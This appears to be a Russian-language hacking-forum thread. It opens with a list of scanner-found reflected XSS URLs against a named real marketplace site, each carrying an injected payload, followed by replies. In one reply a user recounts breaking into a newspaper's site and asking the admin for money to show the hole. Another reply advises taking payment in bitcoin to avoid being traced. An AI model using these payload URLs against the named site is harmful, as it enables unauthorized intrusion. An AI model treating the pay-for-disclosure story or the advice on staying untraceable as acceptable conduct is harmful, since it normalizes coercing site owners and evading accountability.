Уязвимости:

| XSS:

| [+] Vul[1] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">alert('XSS')

| [+] Vul[2] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">'';!--"=&{()}

| [+] Vul[3] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">

| [+] Vul[4] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">

| [+] Vul[5] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">

| [+] Vul[6] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">

| [+] Vul[7] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">

| [+] Vul[8] [XSS] http://mirtesen.ru/market/dom-i-dacha/tekstil/podushki?vendor=">

| [+] Vul[9] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">alert('XSS')

| [+] Vul[10] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">'';!--"=&{()}

| [+] Vul[11] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">

| [+] Vul[12] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">

| [+] Vul[13] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">

| [+] Vul[14] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">

| [+] Vul[15] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">

| [+] Vul[16] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzykalnye-instrumenty?vendor=">

| [+] Vul[17] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">alert('XSS')

| [+] Vul[18] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">'';!--"=&{()}

| [+] Vul[19] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">

| [+] Vul[20] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">

| [+] Vul[21] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">

| [+] Vul[22] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">

| [+] Vul[23] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">

| [+] Vul[24] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/bilety?sort=">

| [+] Vul[25] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">alert('XSS')

| [+] Vul[26] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">'';!--"=&{()}

| [+] Vul[27] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">

| [+] Vul[28] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">

| [+] Vul[29] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">

| [+] Vul[30] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">

| [+] Vul[31] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">

| [+] Vul[32] [XSS] http://mirtesen.ru/market/dosug-i-razvlecheniya/muzyka?vendor=">

да там и в поиске такая же ***ня и скорее всего вообще в любом поле

http://mirtesen.ru/market/search?search=">alert('pwn')

Хрень, нечего интересного!!!!! Постоянно перекидывает на search

И зачем для этого создавать отдельную тему? Есть соответствующая тема, для такой мелочевки, другое дело если бы ты известный ресурс какой слил, а тут всего лишь ХСС'ки

SooLFaa said:
↑ (https://antichat.live/posts/4099064/)
И зачем для этого создавать отдельную тему? Есть соответствующая тема, для такой мелочевки, другое дело если бы ты известный ресурс какой слил, а тут всего лишь ХСС'ки


при том найденные сканером

полная шляпа, перекидывает на search

Меня так чуть не посадили за взлом сайта городской газеты с активной хсс

Coost said:
↑ (https://antichat.live/posts/4103040/)
Меня так чуть не посадили за взлом сайта городской газеты с активной хсс


Анонимности тебе не занимать)))

zer0_igL said:
↑ (https://antichat.live/posts/4103057/)
Анонимности тебе не занимать)))


Да я и сайту не врядил. Вставил безобидный алерт скрипт, связался с админом, предложил показать дырку за копейки, он согласился. Дал ему номер вебмани, он написал заявление в мусарню. Менты подали запрос в вебмани и получили мои данные (работали тк заяву написали журналисты, а так обычно им пох).

Ну и потом комп на экспертизу (благо, что ничего кроме этой формы не копали) и суд по статье 361 УК Украины.

Вот и делай людям добро. Пробили только по кошельку, анонимности хватало.

Coost said:
↑ (https://antichat.live/posts/4103061/)
Да я и сайту не врядил. Вставил безобидный алерт скрипт, связался с админом, предложил показать дырку за копейки, он согласился. Дал ему номер вебмани, он написал заявление в мусарню. Менты подали запрос в вебмани и получили мои данные (работали тк заяву написали журналисты, а так обычно им пох).
Ну и потом комп на экспертизу (благо, что ничего кроме этой формы не копали) и суд по статье 361 УК Украины.
Вот и делай людям добро. Пробили только по кошельку, анонимности хватало.


Админ пидаром оказало, краснопузый мудозвон...

Coost said:
↑ (https://antichat.live/posts/4103061/)
предложил показать дырку за копейки


Это уже вымогательство, владельцы ресурса сами должны принимать решение о выплатах за сообщения об уязвимостях, а если уже пришло в голову подобным бредом заниматься, то хотя бы деньги на биткоин принимайте.

вебмани в 2к17

RWD said:
↑ (https://antichat.live/posts/4103571/)
Это уже вымогательство, владельцы ресурса сами должны принимать решение о выплатах за сообщения об уязвимостях, а если уже пришло в голову подобным бредом заниматься, то хотя бы деньги на биткоин принимайте.
вебмани в 2к17


А кто тебе сказал, что это было в 2к17? Тогда биткоинов ещё небыло.

Это не вымогательство. Вымогательство — это если бы я блокировал сайт через такую дырку и просил деньги за разблокировку. А ведь такая возможность была.